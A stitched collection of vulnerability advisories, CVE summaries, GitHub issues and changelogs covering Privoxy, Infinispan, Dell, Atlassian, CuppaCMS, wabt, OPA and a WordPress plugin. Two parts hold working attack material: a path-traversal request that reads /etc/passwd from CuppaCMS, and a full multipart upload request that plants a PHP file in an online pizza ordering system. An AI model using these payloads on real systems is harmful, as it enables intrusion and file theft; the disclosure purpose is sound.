A flaw was found in Privoxy in versions before 3.0.29. Memory leaks when a response is buffered and the buffer limit is reached or Privoxy is running out of memory can lead to a system crash.

*   Added experimental https inspection support which allows to filter https traffic. To enable it, install MbedTLS and configure with --with-mbedtls, or install OpenSSL or LibreSSL and configure with --with-openssl. Afterwards configure the directives in section 7 of the config file and enable the +https-inspection action. Initial MbedTLS-based code contributed by Vaclav Svec, initial OpenSSL support contributed by Maxim Antonov. With help from Nedzad Hrnjica and Ho+ Ho+ Ho+. Integration and improvements sponsored by Robert Klemme.
    
*   pcrs: Request JIT compilation if it's supported and the filter isn't dynamic. This can speed up filtering.
    
*   Added support for Brotli decompression. Sponsored by: Robert Klemme
    
*   Added FEATURE\_EXTENDED\_STATISTICS to gather statistics for block reasons and filter executions. To enable it, configure with --enable-extended-statistics and visit http://config.privoxy.org/show-status. Sponsored by: Robert Klemme
    
*   Use the IP\_FREEBIND socket option, if defined. This allows Privoxy to bind to not-yet assigned IP addresses which is useful in failover environments. Patch by Sam Varshavchik.
    
*   Allow to use extended host patterns and vanilla host patterns at the same time by prefixing extended host patterns with "PCRE-HOST-PATTERN:". To enable this, configure with --enable-pcre-host-patterns. Sponsored by: Robert Klemme
    
*   Added "Cross-origin resource sharing" (CORS) support. This allows to access Privoxy's CGI interface via JavaScript from another domain (white-listed with the new cors-allowed-origin directive). Based on a patch by Nedzad Hrnjica. Sponsored by: Robert Klemme.
    
*   Add SOCKS5 username/password support. Based on a patch by Sam, improved by Ivan Romanov. Closes Patch#141 and solves TODO#105.
    
*   Bump the maximum number of action and filter files to 100 each. Sponsored by: Robert Klemme
    
*   Fixed handling of filters with "split-large-forms 1" when using the CGI editor. Reported by withoutname in #921.
    
*   Better detect a mismatch of connection details when figuring out whether or not a connection can be reused.
    
*   Don't send a "Connection failure" message instead of the "DNS failure" message. Sponsored by: Robert Klemme
    
*   Let LOG\_LEVEL\_REQUEST log all requests. Previously unencrypted requests were only logged with LOG\_LEVEL\_REQUEST when they weren't crunched (in which case they were logged with LOG\_LEVEL\_CRUNCH). This was documented behaviour, but logging all requests seems more useful.
    
*   Fixed locking around localtime() and gmtime().
    
*   Removed OS/2 support. We haven't provided OS/2 packages in years, it complicated the code and it depended on a fallback snprintf() implementation which is GPLv2 only.
    
*   Remove the fallback snprintf() implementation Now that OS/2 support is gone we no longer need it.
    
*   Fixed a bunch of format specifiers log messages.
    
*   Added a missing apostrophe in the 'More Privoxy' menu.
    
*   Explicitly prevent use of FEATURE\_CONNECTION\_SHARING without FEATURE\_CONNECTION\_KEEP\_ALIVE. It makes no sense and does not compile anyway. Sponsored by: Robert Klemme
    
*   Fix build without FEATURE\_CONNECTION\_KEEP\_ALIVE. Sponsored by: Robert Klemme
    
*   Downgrade the 'Graceful termination requested' message to LOG\_LEVEL\_INFO as it isn't an error. Sponsored by: Robert Klemme
    
*   decompress\_iob(): Downgrade the no-content message to LOG\_LEVEL\_RE\_FILTER While at it, fix a typo in a comment. Sponsored by: Robert Klemme
    
*   Fixed a couple of cppcheck warnings.
    
*   Rename LOG\_LEVEL\_GPC to LOG\_LEVEL\_REQUEST. Only the shadow knows what "GPC" is supposed to stand for.
    
*   Remove SourceForge references in copyright headers.
    
*   Upgrade a bunch of links to the homepage to https://.
    
*   Add 'no-brotli-accepted' filter which prevents the use of Brotli compression.
    
*   Changed license for pcrs to GPLv2+ after getting the permission from Andreas. This allows to redistribute Privoxy under the GPLv3 which is required when linking to future mbedTLS versions which are expected to be licensed under the Apache 2.0 license only.
    
*   Updated a bunch of tests that have to expect status code 403 now after r1.168/070e904afa5.
    
*   Lowercase the host name in the request line.
    
*   Only set SOURCE\_DATE\_EPOCH if it's not already set so distributions can overwrite it through the environment.

CVE-2020-35502: What's New in this Release

A flaw was found in infinispan 10 REST API, where authorization permissions are not checked while performing some server management operations. When authz is enabled, any user with authentication can perform operations like shutting down the server without the ADMIN role.

CVE-2020-25711: 1897618 – (CVE-2020-25711) CVE-2020-25711 infinispan: authorization check missing for server management operations


Dell Rugged Control Center, version prior to 4.7, contains insufficient protection for the Policy folder. A local malicious standard user could potentially exploit this vulnerability to modify the content of the policy file, leading to unauthorized access to resources.



**Impact**

Medium

**Details**

Proprietary Code CVE(s)

Description

CVSS Base Score

CVSS Vector String

CVE-2023-43089

Dell Rugged Control Center, version prior to 4.7, contains insufficient protection for the Policy folder. A local malicious standard user could potentially exploit this vulnerability to modify the content of the policy file, leading to unauthorized access to resources.

4.4

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Proprietary Code CVE(s)

Description

CVSS Base Score

CVSS Vector String

CVE-2023-43089

Dell Rugged Control Center, version prior to 4.7, contains insufficient protection for the Policy folder. A local malicious standard user could potentially exploit this vulnerability to modify the content of the policy file, leading to unauthorized access to resources.

4.4

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

CVE(s) Addressed

Product

Affected Version(s)

Updated Version(s)

Link to Update

CVE-2023-43089

Dell Rugged Control Center

Versions prior to 4.7

Version 4.7

https://www.dell.com/support/home/drivers/driversdetails?driverid=4M3T2

CVE(s) Addressed

Product

Affected Version(s)

Updated Version(s)

Link to Update

CVE-2023-43089

Dell Rugged Control Center

Versions prior to 4.7

Version 4.7

https://www.dell.com/support/home/drivers/driversdetails?driverid=4M3T2

**Workarounds and Mitigations**

Dell Rugged Control Center UI would provide an SHA-256 hash of the Policy File to the administrator, which can be used to cross-verify the legitimacy of the policy file after transfer.  

**Revision History**

Revision

Date

Description

1.0

2023-11-30

Initial Release

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

CVE-2023-43089: DSA-2023-371: Dell Rugged Control Center Security Update for an Improper Access Control Vulnerability

Jira, Confluence,Trello, and BitBucket affected.

**BENGALURU, December 13, 2022 —** Researchers at CloudSEK observed that for Atlassian products - Jira, Confluence, and BitBucket, cookies are not invalidated, even if the password is changed, with 2FA (Two-factor Authentication) enabled, as the cookie validity is 30 days. They only expire when the user logs out, or after 30 days.

CloudSEK researchers have identified that this flaw can be leveraged by threat actors to take over hundreds of companies’ Jira accounts. Our records show over 1,282,859 compromised computers and 16,201 Jira cookies for sale on dark web marketplaces. And just in the last 30 days, over 2,937 compromised computers and 246 Jira credentials were made available. In the past 90 days, we have observed at least one compromised computer from a Fortune 1000 company. This is just considering their primary domains, not their subsidiaries. (Check the complete blog) 

The new finding came after Dec 06, 2022, when CloudSEK disclosed a cyber attack directed at the company. During the course of the investigation into the root cause of the incident, the internal investigation team identified that the threat actor gained access to a CloudSEK employee’s Jira account, using Jira session cookies present in stealer logs being sold on the dark web.

CloudSEK is releasing a free tool that lets companies check if their compromised computers and Jira accounts are being advertised on dark web marketplaces.

With over 10 million users across 180,000 companies, including 83% of Fortune 500 companies, Atlassian products are widely used across the globe. And threat actors are actively exploiting this flaw to compromise enterprise Jira accounts.

**Stolen Atlassian Cookies Can Lead to Unauthorized Account Access even if 2FA enabled**

CloudSEK’s investigation shows that cookies of Atlassian products remain valid for a period of 30 days, even if the password is changed and 2FA is enabled. Hence, threat actors can restore Jira, Confluence, Trello, or BitBucket sessions, using stolen cookies, even if they don’t have access to Multi-factor Authentication (MFA), OTP/ PIN. The cookies, by default, expire when the user logs out, or after 30 days.(Check the complete blog)

This is a known issue, and most companies do not consider it to be within the scope of security reporting, because to use this and get into systems, tokens are required.

However, it is no longer very difficult for threat actors to get their hands on these tokens. With the rise in device compromise campaigns, breaches, and password leaks, cookie theft has become commonplace. And cookies are available for sale and one can simply search for a company, buy their logs, find relevant tokens to gain access to their internal systems. In the last 30 days, more than 200unique instances of atlassian.net related credentials/ cookies have been put up for sale on darkweb marketplaces. Given that the credentials were put up for sale in the last 30 days, it is highly likely that many of them are still active.

In the case of Atlassian products, only one JSON web token (JWT) is required to hijack a session i.e._cloud.session.token_. Atlassian JWT (JSON Web Token) tokens have the email address embedded in the cookie. Hence, it is easy to determine which user the cookie belongs to.

You can check if your organization’s data is available for sale on dark web marketplaces here.

Security Flaw in Atlassian Products Affecting Multiple Companies

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.

Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa\_cms.zip

**poc**

    POST /alerts/alertConfigField.php
    urlConfig=../../../../../../../../../../../../../../etc/passwd
    

![image](https://user-images.githubusercontent.com/38547290/154229228-9fd38bfd-af68-4231-961d-9ef10880556e.png)

**analysis**

location: /alerts/alertConfigField.php line 77  
![image](https://user-images.githubusercontent.com/38547290/154229347-e0521d71-4030-4dca-9227-a605f89558a1.png)  
`<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>`  
and $cuppa->POST

           // post
        public function POST($string){
                    return $this->sanitizeString(@$_POST[$string]);
           }
    

go on

          public function sanitizeString($string){
                    return htmlspecialchars(trim(@$string));
                }
    

so the post urlConfig without any lfi protected filter

**Repair suggestions**

you can check urlConfig ,for example check if it has .. then refuse this request

CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS

WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote (").

**Comments**

keithw added a commit that referenced this issue

Mar 10, 2023

This adds a bounds-check to WastLexer::GetText to handle the case when
the offset is earlier than token\_start (e.g. because GetStringToken
found a newline in the string and reset token\_start to point to it).

Also revises GetIdToken -> GetIdChars to stop skipping the initial char
in an annotation delimiter, which is an idchar+ but not an id token.

Also fixes the WastParser to handle EOF when reading for the end of an
annotation, both for code metadata annotation and other kinds.
Previously this produced an infinite loop (but only when
--enable-annotations was provided).

Fixes #2165

keithw added a commit that referenced this issue

Mar 10, 2023

This adds a bounds-check to WastLexer::GetText to handle the case when
the offset is earlier than token\_start (e.g. because GetStringToken
found a newline in the string and reset token\_start to point at it).

Also revises GetIdToken -> GetIdChars to stop skipping the initial char
in an annotation delimiter, which is an idchar+ but not an id token.

Also fixes the WastParser to handle EOF when reading for the end of an
annotation, both for code metadata annotations and other kinds.
Previously this produced an infinite loop (but only with
--enable-annotations).

Fixes #2165

keithw added a commit that referenced this issue

Mar 10, 2023

This adds a bounds-check to WastLexer::GetText to handle the case when
the offset is earlier than token\_start (e.g. because GetStringToken
found a newline in the string and reset token\_start to point at it).

Also revises GetIdToken -> GetIdChars to stop skipping the initial char
in an annotation delimiter, which is an idchar+ but not an id token.

Also fixes the WastParser to handle EOF when reading for the end of an
annotation, both for code metadata annotations and other kinds.
Previously this produced an infinite loop (but only with
--enable-annotations).

Fixes #2165

CVE-2023-31669: '@' before a quote (") causes a libc++abi.dylib crash using wat2wasm. · Issue #2165 · WebAssembly/wabt

PRESS RELEASE

LONDON, Sept. 10, 2024 /PRNewswire/ -- In the past 12 months, over half of organisations were impacted by cyber threats. Larger companies in particular were much more likely to come under attack.

The severity of these incidents is directly contributing to job losses. Of 500 UK IT, resilience and cyber security professionals surveyed, 37% reported that cyber-attacks resulted in dismissals.

Last year, Databarracks' Data Health Check (DHC) found that cyber-attacks are organisation's leading cause of downtime and data loss. In 2024, that is still the case.

Data lost to cyber incidents varies greatly by company size, with larger businesses five times more likely to be impacted.

Chris Butler, Resilience Director at Databarracks, commented:

"It should come as little surprise that cyber remains organisations' leading cause of downtime and data loss. The real news is that cyber is now having a significant impact on employees.

"Over a third of those surveyed in the DHC report job losses as a result of cyber-attacks. These could be IT or Security staff being dismissed in direct response to the breach, or wider layoffs from business disruption.

"Cyber-attacks on businesses are often seen as victimless crimes because losses are covered by insurance. These results show that attacks have a personal impact.

"Today, IT teams are faced with significantly more risk and threats to the continuity of their organisations, which can have a profound impact on their wellbeing. But the same can be said for employees across a business.

"Staff may be uncertain about what an attack means for the future of their company, and by extension their own job security. Your first line of defence is your staff, and so it is crucial that they are kept well-trained and appropriately informed in the event of an incident."

Read the highlights from the Data Health Check 2024: https://datahealthcheck.databarracks.com/2024/ 

Download the full DHC report: https://www.databarracks.com/resources/data-health-check-2024

Over a Third of Cyberattacks Result in Job Losses

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:  
[href](https://streamable.com/szb9qy)

## Time spend:  
00:45:00

Online Pizza Ordering 1.0 Shell Upload

Open Policy Agent (OPA) is an open source, general-purpose policy engine. The Rego compiler provides a (deprecated) `WithUnsafeBuiltins` function, which allows users to provide a set of built-in functions that should be deemed unsafe â€” and as such rejected â€” by the compiler if encountered in the policy compilation stage. A bypass of this protection has been found, where the use of the `with` keyword to mock such a built-in function (a feature introduced in OPA v0.40.0), isnâ€™t taken into account by `WithUnsafeBuiltins`. Multiple conditions need to be met in order to create an adverse effect. Version 0.43.1 contains a patch for this issue. As a workaround, avoid using the `WithUnsafeBuiltins` function and use the `capabilities` feature instead.

Signed-off-by: Damien Burks <damien@damienjburks.com>

updating changes to allow for multiple format strings

Signed-off-by: Damien Burks <damien@damienjburks.com>

fixing golint issues

Signed-off-by: Damien Burks <damien@damienjburks.com>

fixing golint issues

Signed-off-by: Damien Burks <damien@damienjburks.com>

making recommended change: package level variable

Signed-off-by: Damien Burks <damien@damienjburks.com>

adding support for explicit argument indexes

Signed-off-by: Damien Burks <damien@damienjburks.com>

format: don't add 'in' keyword import when 'every' is there (open-policy-agent#4607)

Also ensure that added imports have a location set.

Previously, \`opa fmt\` on the added test file would have panicked
because the import hadn't had a location.

Fixes open-policy-agent#4606.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

ast+topdown+planner: allow for mocking built-in functions via "with" (open-policy-agent#4540)

With this change, we can replace calls to built-in functions via \`with\`. The replacement
can either be a value -- which will be used as the return value for every call to the
mocked built-in -- or a reference to a non-built-in function -- when the results need
to depend on the call's arguments.

Compiler, topdown, and planner have been adapted in this change. The included
docs changes describe the replacement options further.

Fixes first part of open-policy-agent#4449. (Missing are non-built-in functions as mock targets.)

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump google.golang.org/grpc from 1.45.0 to 1.46.0 (open-policy-agent#4617)

docs/policy-testing: use assignment operator in mocks (open-policy-agent#4618)

Additionally, simplify one test example.

Signed-off-by: Anders Eknert <anders@eknert.com>

cmd/capabilities: expose capabilities through CLI (open-policy-agent#4588)

There is a new command argument "capabilities". With this, it is
possible to print the current capabilities version, show all
capabilities versions & print any capabilities version, without the need
of a file. Moreover, for the other commands which use the --capabilities
flag, it is possible to give only the version number, without specifying
a file. However, there are no breaking changes for those who use the
capabilities file as an input for the flag. Unit tests were also
written, in order to test the new argument and the changes made in ast.

Fixes: open-policy-agent#4236

Signed-off-by: IoannisMatzaris <matzarisioannis@gmail.com>

format,eval: don't use source locations when formatting PE output (open-policy-agent#4611)

\* format: allow ignoreing source locations
\* cmd/eval: format disregarding source locations for partial result

Before, we'd see this output:
\`\`\`
$ opa eval -p -fsource 'time.clock(input.x)==time.clock(input.y)'
time.clock(time.clock(input.x), input.y)
\`\`\`

Now, we get the proper answer: \`time.clock(input.y, time.clock(input.x))\`.

Note that it's a \_display\_ issue; the JSON output of PE has not been affected.

Fixes open-policy-agent#4609.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump github/codeql-action from 1 to 2 (open-policy-agent#4621)

Bumps \[github/codeql-action\](https://github.com/github/codeql-action) from 1 to 2.
- \[Release notes\](https://github.com/github/codeql-action/releases)
- \[Changelog\](https://github.com/github/codeql-action/blob/main/CHANGELOG.md)
- \[Commits\](github/codeql-action@v1...v2)

---
updated-dependencies:
- dependency-name: github/codeql-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

status: Remove activeRevision label on all but one metric (open-policy-agent#4600)

Having one activeRevision label on each of the prometheus metrics emitted
by the status plugin has proven to be problematic with a large number of
bundles. So with this change,

1. we keep the activeRevision label (just on) the last\_success\_bundle\_activation metric.
2. the gauge gets reset, so we only keep the last active\_revision (instead of keeping
   them all and therefore avoiding the situation where the /metrics output grows indefinitely)

Fixes open-policy-agent#4584.

Signed-off-by: cmuraru <cmuraru@adobe.com>

website: add playground button to navbar (open-policy-agent#4622)

Addressing one tiny bit of open-policy-agent#4614.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

topdown/net: require prefix length for IPv6 in net.cidr\_merge (open-policy-agent#4613)

There are no default prefixes in IPv6, so if an IPv6 without a prefix is fed into
net.cidr\_merge, we'll return a non-halt error now.

Before, we'd fail in various ways if a prefix-less IPv6 was fed into
\`net.cidr\_merge\`. With only one, we'd return \`\[ "<nil>" \]\`, with two,
we'd panic.

Fixes open-policy-agent#4596.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

Dockerfile: add source annotation (open-policy-agent#4626)

\`org.opencontainers.image.source\` URL to get source code for building the image (string)

https://github.com/opencontainers/image-spec/blob/main/annotations.md

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump github.com/fsnotify/fsnotify v1.5.2 -> v1.5.4 (open-policy-agent#4628)

https://github.com/fsnotify/fsnotify/releases/tag/v1.5.4

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

docs: update version in kubernetes examples (open-policy-agent#4627)

Signed-off-by: yongen.pan <yongen.pan@daocloud.io>

bundle/status: Include bundle type in status information

OPA has support for Delta Bundles. The status object already
contains valuable information such as last activation timestamp but
does not specify if the bundle was a canonical snapshot or delta.

This change updates the bundle.Status object to include the
bundle type string: either "snapshot" or "delta". This can be useful
for status endpoints to differentiate between the bundle types.

Issue: 4477

Signed-off-by: Bryan Fulton <bryan@styra.com>

ast+topdown+planner: replacement of non-built-in functions via 'with' (open-policy-agent#4616)

Follow-up to open-policy-agent#4540

We can now mock functions that are user-defined:

    package test

    f(\_) = 1 {
        input.x = "x"
    }
    p = y {
        y := f(1) with f as 2
    }

...following the same scoping rules as laid out for built-in mocks.
The replacement can be a value (replacing all calls), or a built-in,
or another non-built-in function.

Also addresses bugs in the previous slice:
\* topdown/evalCall: account for empty rules result from indexer
\* topdown/eval: capture value replacement in PE could panic

Note: in PE, we now drop 'with' for function mocks of any kind:

These are always fully replaced in the saved support modules, so
this should be OK.

When keeping them, we'd also have to either copy the existing definitions
into the support module; or create a function stub in it.

Fixes open-policy-agent#4449.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

format: keep whitespaces for multiple indented same-line withs (open-policy-agent#4635)

Fixes open-policy-agent#4634.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

downloader: support for downloading bundles from an OCI registry (open-policy-agent#4558)

Initial support for open-policy-agent#4518.

Configuration uses the 'services' config for registries, via the "type: oci" field.
Bundles configured to pull from that service will then use OCI.

\`\`\`
services:
  ghcr-registry:
    url: https://ghcr.io
    type: oci
bundles:
  authz:
    service: ghcr-registry
    resource: ghcr.io/${ORGANIZATION}/${REPOSITORY}:${TAG}
    persist: true
    polling:
      min\_delay\_seconds: 60
      max\_delay\_seconds: 120
persistence\_directory: ${PERSISTENCE\_PATH}
\`\`\`

Service credentials are supported: if you want to pull from a private registry,
use
\`\`\`
services:
  ghcr-registry:
    url: https://ghcr.io
    type: oci
    credentials:
      bearer:
        token: ${GH\_PAT}
\`\`\`

If no \`persistence\_directory\` is configured, the data is stored in a directory under /tmp.

See docs/devel/OCI.md for manual steps to test this feature with some
OCI registry (like ghcr.io).

Signed-off-by: carabasdaniel <dani@aserto.com>

Prepare v0.40.0 Release (open-policy-agent#4631)

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

Prepare v0.41.0 development (open-policy-agent#4636)

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

docs: Adding example for \`rego.metadata.role()\` usage (open-policy-agent#4640)

Signed-off-by: Johan Fylling <johan.dev@fylling.se>

build(deps): bump oras.land/oras-go from 1.1.0 to 1.1.1 (open-policy-agent#4643)

Bumps \[oras.land/oras-go\](https://github.com/oras-project/oras-go) from 1.1.0 to 1.1.1.
- \[Release notes\](https://github.com/oras-project/oras-go/releases)
- \[Commits\](oras-project/oras-go@v1.1.0...v1.1.1)

---
updated-dependencies:
- dependency-name: oras.land/oras-go
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

build(deps): bump OpenTelemetry 1.6.3 -> 1.7.0 (open-policy-agent#4649)

https://github.com/open-telemetry/opentelemetry-go/releases/tag/v1.7.0
https://github.com/open-telemetry/opentelemetry-go-contrib/releases/tag/v1.7.0

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump github.com/containerd/containerd from 1.6.2 to 1.6.3 (open-policy-agent#4654)

Bumps \[github.com/containerd/containerd\](https://github.com/containerd/containerd) from 1.6.2 to 1.6.3.
- \[Release notes\](https://github.com/containerd/containerd/releases)
- \[Changelog\](https://github.com/containerd/containerd/blob/main/RELEASES.md)
- \[Commits\](containerd/containerd@v1.6.2...v1.6.3)

---
updated-dependencies:
- dependency-name: github.com/containerd/containerd
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

Update k8s examples to the latest schema (open-policy-agent#4655)

Signed-off-by: Víctor Martínez Bevià <vicmarbev@gmail.com>

Fix incorrect padding claims (open-policy-agent#4657)

Signed-off-by: Anders Eknert <anders@eknert.com>

build(deps): bump github.com/containerd/containerd from 1.6.3 to 1.6.4 (open-policy-agent#4662)

Bumps \[github.com/containerd/containerd\](https://github.com/containerd/containerd) from 1.6.3 to 1.6.4.
- \[Release notes\](https://github.com/containerd/containerd/releases)
- \[Changelog\](https://github.com/containerd/containerd/blob/main/RELEASES.md)
- \[Commits\](containerd/containerd@v1.6.3...v1.6.4)

---
updated-dependencies:
- dependency-name: github.com/containerd/containerd
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

build(deps): bump docker/setup-qemu-action from 1 to 2 (open-policy-agent#4668)

build(deps): bump docker/setup-buildx-action from 1 to 2 (open-policy-agent#4669)

Bumps \[docker/setup-buildx-action\](https://github.com/docker/setup-buildx-action) from 1 to 2.
- \[Release notes\](https://github.com/docker/setup-buildx-action/releases)
- \[Commits\](docker/setup-buildx-action@v1...v2)

---
updated-dependencies:
- dependency-name: docker/setup-buildx-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

build(deps): github.com/bytecodealliance/wasmtime-go 0.35.0 -> 0.36.0 (open-policy-agent#4652)

\* build(deps): bump wasmtime-go: 0.35.0 -> 0.36.0
\* internal/wasm: adapt to using epoch-based interruption

Looks like we don't get frames for this.

Also, there is currentlty no better way than comparing the message,
as the trap code isn't surfaced (yet).

Fixes open-policy-agent#4663.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

ecosystem: Add Sansshell (open-policy-agent#4674)

Signed-off-by: James Chacon <james.chacon@snowflake.com>

topdown: Add units.parse builtin (open-policy-agent#4676)

This function works on all base decimal and binary SI units of the set:

    m, K/Ki, M/Mi, G/Gi, T/Ti, P/Pi, and E/Ei

Note: Unlike \`units.parse\_bytes\`, this function is case sensitive.

Fixes open-policy-agent#1802.

Signed-off-by: Philip Conrad <philipaconrad@gmail.com>

docs/contrib-code: Add capabilities step to built-in functions tutorial (open-policy-agent#4677)

Signed-off-by: Philip Conrad <philipaconrad@gmail.com>

Add nginx integration (open-policy-agent#4682)

Signed-off-by: Anders Eknert <anders@eknert.com>

util/Unmarshal: if it's JSON, skip YAMLtoJSON (open-policy-agent#4681)

This helper accepts JSON or YAML, and used to do this:

1. For YAML input, yaml.YAMLToJSON would parse it as yaml, marshal it to
   JSON, and pass that back out to be passed to UnmarshalJSON
2. For JSON input, yaml.YAMLToJSON would also parse it as yaml, marshal it
   to JSON, and pass that back out to UnmarshalJSON

Issue open-policy-agent#4673 has shown that the theoretical "superset" propery of YAML doesn't
seem to hold in all cases.

So now, we'll do this:

1. For YAML input, yaml.YAMLToJSON would parse it as yaml, marshal it to
   JSON, and pass that back out to be passed to UnmarshalJSON
2. For JSON input, json.Valid will determine that it's JSON, and we'll
   feed it into UnmarshalJSON as-is.

The YAML path (1.) still seems suboptimal, but I also suspect that JSON is
more common. Also, this change shouldn't make the YAML path much worse:
determining that yaml string isn't valid JSON should be quick.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

OCI: skip reloading bundle if tarball SHA did not change (open-policy-agent#4658)

Fixes open-policy-agent#4637.

Signed-off-by: carabasdaniel <dani@aserto.com>

docs/content: Correct --tls-ca-cert-path in security doc (open-policy-agent#4686)

Change --tls-ca-cert-path to --tls-ca-cert-file since --tls-ca-cert-path
is not a valid option (and a typo)

Fixes: open-policy-agent#4678

Signed-off-by: Krishna Pramod A <krishna.adharapurapu@rakuten.com>

refactoring: adding helper method for sprintf

CVE-2022-36085: compiler: allow for mocking built-in functions via "with" by srenatus · Pull Request #4540 · open-policy-agent/opa

Cross-Site Request Forgery (CSRF) vulnerability in scriptburn.Com WP Hide Post plugin <= 2.0.10 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Found this useful? Thank Lana Codes for reporting this vulnerability. Buy a coffee ☕

Lana Codes discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress WP Hide Post Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Search

lenovo warranty check/lookup | check warranty status | lenovo support us